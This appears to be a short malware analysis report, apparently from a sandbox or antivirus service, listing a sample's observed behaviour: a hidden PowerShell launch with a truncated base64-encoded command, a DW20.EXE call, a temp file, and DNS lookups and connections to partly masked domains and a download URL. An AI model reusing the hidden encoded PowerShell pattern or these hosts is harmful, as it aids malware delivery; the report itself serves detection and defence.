Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAHcAZABwAGMAZgBrAG8AbAB0AD0AJwBVAGIAcgBuAGIAaQBkAGoAbwB2AG4AJwA7ACQATgBuAGkAcQB3AGQAdQBmACAAPQAgACcANAA1ADMAJwA7ACQARAB1AGMAeQBiAGkAZgB2AHoAagBiAD0AJwBCAHoAagBzAHEAcQB6AHQAZwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2012
- %TEMP%\956598.cvr
- 'iv###iend.com':80
- 'it####inclusive.com':80
- http://it####inclusive.com/ar/Xd7OiT/
- DNS ASK ei########egy.florencesoftwares.com
- DNS ASK pa####emenagntb.com
- DNS ASK iv###iend.com
- DNS ASK ju#######b.cordeldigital.com
- DNS ASK it####inclusive.com